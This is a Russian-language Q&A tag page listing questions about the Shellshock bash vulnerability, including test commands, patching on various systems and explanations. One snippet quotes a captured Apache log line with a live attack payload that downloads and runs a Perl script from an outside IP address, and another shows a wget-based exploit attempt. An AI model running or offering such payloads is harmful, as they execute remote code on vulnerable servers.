Описание тега shellshock-bash-bug
GNU Bash через 4.3 обрабатывает конечные строки после определений функций в значениях переменных среды, что позволяет удаленным злоумышленникам выполнять произвольный код через созданную среду.
2
ответа
Как работает CVE-2014-7169? Разбивка тестового кода
С выпуском bash, который был исправлен для скорлупы $ bash --version GNU bash, version 3.2.52(1)-release (x86_64-apple-darwin12) Copyright (C) 2007 Free Software Foundation, Inc. $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" bash…
25 сен '14 в 15:06
0
ответов
Обновите bash, но bash - версия без изменений, почему
Для выпуска Shellshock я обновляю bash на redhat 4,5, используя следующие шаги проверить версию bash root@aaaA:/usr/src/redhat/RPMS/x86_64>bash --version GNU bash, version 3.2.25(1)-release (x86_64-redhat-linux-gnu) Copyright (C) 2005 Free Softwa…
29 сен '14 в 06:55
2
ответа
Установить функцию Bash для среды
Мне нужно определить функцию Bash в среде Bash из программы на C/C++. До ошибки в снаряде я мог определить функцию следующим образом: my_func='() { echo "This is my function";}' Или эквивалент из программы на C: setenv("my_func", "() { echo \"This i…
10 окт '14 в 07:19
1
ответ
Использование Python на OS X подвергает меня Shellshock?
Различные организации, наряду с Apple, уверяют пользователей OS X в том, что они не подвержены особому риску из-за эксплойта Shellshock bash. Тем не менее, я часто использую Python в своей системе и задаюсь вопросом, увеличит ли это мой риск; и могу…
26 сен '14 в 11:50
1
ответ
Требуется ли для использования bash (CVE-2014-6271) терминальный доступ?
Со всей паникой, связанной с CVE-2014-6271, я нашел мало конкретной информации относительно площади уязвимости. В частности, требует ли человек доступа к терминалу для выполнения этого эксплойта? Мне известно, что сервисы CGI, которые вызывают оболо…
25 сен '14 в 16:06
2
ответа
Регрессия: Экспортированная функция Bash потеряна после прохождения другого процесса
При переходе с Ubuntu 14.04 на 16.04 я заметил, что некоторые из моих скриптов Bash не работают из-за отсутствия экспортируемых функций. Интересно, связано ли это с исправлениями ошибки Shellshock, хотя я просто export -f функции, и не полагаясь на …
28 июн '16 в 15:05
0
ответов
Каков конкретный пример того, как можно использовать ошибку Shellshock Bash?
Я прочитал несколько статей ( article1, article2, article3) об ошибке Shellshock Bash ( CVE-2014-6271, опубликованной 24 сентября 2014 г.), и у меня есть общее представление о том, что такое уязвимость и как ее можно использовать. Чтобы лучше понять…
24 сен '14 в 23:13
1
ответ
Может кто-нибудь объяснить код Shell Shock Bash?
У меня проблемы с пониманием следующего кода, который является "доказательством уязвимости" кода Shell Shock. Может кто-нибудь объяснить это мне? Специально эта часть() { :;};" env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
26 сен '14 в 04:33
1
ответ
Почему мой пакет bash 4.1.2 не уязвим к шеллшоку? Мой тест неверен?
Моя версия оболочки Bash - GNU bash, версия 4.1.2(2)-релиз (x86_64-redhat-linux-gnu). Я проверил ошибку "шеллшок" с помощью команды ниже x='() { :;}; echo VULNERABLE' bash -c :. Не было распечатано Уязвимое сообщение назад. Я читал, что ошибка сущес…
01 фев '17 в 15:33
1
ответ
Не импортированная переменная среды с фиксированной версией bash
У меня есть простой скрипт bash, который изменяет переменную среды, которая будет использоваться последующим двоичным файлом. Ниже мой основной сценарий: #!/bin/bash export DBROOT="NEW_DIRECTORY" export TERM=xterm su -c " <test_process> " - om…
21 окт '14 в 15:37
1
ответ
Влияние ошибки BASH на веб-сайты Azure, облачные службы и базу данных SQL?
Только что читал об этой потенциально серьезной ошибке на базе Linux. Казалось бы, Azure должен быть на безопасной стороне, поскольку основан на Windows, и, скорее всего, быстро исправлен, потому что именно поэтому мы используем Platform As A Servic…
25 сен '14 в 16:01
2
ответа
Shellshock - почему допускается внедрение переменных среды?
Есть две вещи, которые я не понимаю об уязвимости снарядов: Почему введение переменных среды разрешено в непроверенные соединения? Для чего это хорошо? Какие реальные услуги предоставляют возможность вводить переменные? Есть идеи?
27 сен '14 в 23:48
1
ответ
Как восстановить CronTab в моей системе WebMin
Я не знаю, было ли это следствием атаки шелл-шоком, которой подвергся мой сервер (или другой сработавшей атаки), но он в основном позволил хакеру перезаписать мой файл конфигурации SSH при перезагрузке сервера. Этот новый файл использовал wget для з…
06 янв '15 в 12:55
1
ответ
Невозможно использовать уязвимость в виде шелл-шока для всех файлов.
Я пытался использовать уязвимость Shellshock в моей системе и столкнулся с интересной проблемой. Я использовал 'wget', чтобы использовать уязвимость. Команда, которую я использую, выглядит следующим образом: wget -U "() { test;};echo \"Content-type:…
15 ноя '15 в 21:44
3
ответа
Баш Снаряды Джурат Perl сценарий
Я увидел следующую строку под /var/log/apache2/access_log: "GET /cgi-bin/hi HTTP/1.0" 404 357 "-" "() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\"" Я е…
27 сен '14 в 20:58
4
ответа
Как мне обновить Bash в Mac OSX Snow Leopard [и указать правильный путь]?
Я хочу обновить мои программы Bash (и Sh) в моем Mac OS X Snow Leopard (10.6.8), в свете последних ошибок в bash - Shellshock. Я специально использую 10.6.8, поэтому я не хочу обновляться до более новой версии OS X прямо сейчас. Я прочитал этот разд…
27 сен '14 в 23:52
2
ответа
Как проверить и обновить Bash на FreeBSD - связано с ошибкой Shellshock
Сегодня утром, когда я пришел на работу, я прочитал статью об уязвимости, связанной с инъекцией кода Bash через специально созданные переменные среды (CVE-2014-6271) . Я обновил Bash на большинстве своих систем, за которые отвечаю, однако меня попр…
25 сен '14 в 15:03
1
ответ
Что конкретно делает команда env?
Недавно я наткнулся на ошибку "Shellshock", которая является ошибкой в оболочке bash. как-то использует env Команда для создания переменных среды, содержащих функции. $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" Затем эти функ…
25 сен '14 в 19:41
1
ответ
Обходной путь предварительной загрузки ошибки Shellshock Bash
У RedHat был обходной путь для уязвимости Shellshock, которая включает в себя библиотеку предварительной загрузки. URL-адрес исходного кода обходного пути доступен по адресу bash_ld_preload.c. Но обходные пути теперь, похоже, пропали без вести. Это …
25 сен '14 в 21:24
2
ответа
Уязвимость bash CVE-2014-6271 . Может ли это повлиять на мои CGI Perl-скрипты? Это как понять?
Вчера сообщалось о проблеме CVE-2014-6271, которая является уязвимостью BASH Shellshock. Я пытаюсь понять, может ли это повлиять на мой сервер с помощью моих Perl CGI-скриптов. Может ли мой код быть подвержен злонамеренному воздействию - что нужно б…
25 сен '14 в 11:57